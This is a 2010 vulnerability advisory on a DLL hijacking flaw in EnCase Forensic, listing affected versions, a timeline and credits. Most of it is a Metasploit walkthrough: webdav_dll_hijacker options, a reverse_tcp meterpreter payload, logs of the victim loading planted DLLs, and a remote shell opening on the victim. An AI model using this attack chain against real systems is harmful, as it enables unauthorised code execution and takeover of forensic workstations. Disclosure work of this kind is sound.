no one is safe ...

Advisory: EnCase - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking) [Update: 02.09.2010]

---------------------------------------------
EnCase - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------

- EnCase Description

From the simplest requirements to the most complex, EnCase Forensic is the premier computer forensic application on the market.

- Insecure Library Loading allows Remote Code Execution

This vulnerability was discovered using the Metasploit Framework with the following option: "set EXTENSIONS endump"

For more vulnerability details please check the links in the reference section.

- Affected Versions

v6.15.0.82/6.16.2/6.17.0.90 - other releases may also be affected.

- Solution

It is not known if there are fixed releases available.

- Credits

The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at

- Timeline

29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure

- Reference

- Exploiting example:

msf exploit(webdav_dll_hijacker) > set EXTENSIONS endump
EXTENSIONS => endump
msf exploit(webdav_dll_hijacker) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  endump           yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     10.8.28.9        yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     10.8.28.9        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.8.28.9:4444
[*]
[*] Exploit links are now available at \\10.8.28.9\documents\
[*]
[*] Using URL: http://10.8.28.9:80/
[*] Server started.

msf exploit(webdav_dll_hijacker) >
[*] 10.8.28.55:49310 PROPFIND /documents
[*] 10.8.28.55:49310 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49310 PROPFIND /documents/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49310 PROPFIND /documents
[*] 10.8.28.55:49310 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49310 PROPFIND /documents/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 PROPFIND /documents/rsaenh.dll
[*] 10.8.28.55:49310 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 GET => DLL Payload
[*] 10.8.28.55:49310 PROPFIND /documents/SDDisk.dll
[*] 10.8.28.55:49310 PROPFIND => 207 File (/documents/SDDisk.dll)
[*] 10.8.28.55:49310 GET => DLL Payload
[*] 10.8.28.55:49310 PROPFIND /
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49310 PROPFIND => 404 (/documents/rundll32.exe)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 14 opened (10.8.28.9:4444 -> 10.8.28.55:49315) at Sun Aug 29 20:01:53 +0200 2010

msf exploit(webdav_dll_hijacker) > sessions -i 14
[*] Starting interaction with 14...

meterpreter > getuid
Server username: m1k3-Vista\m1k3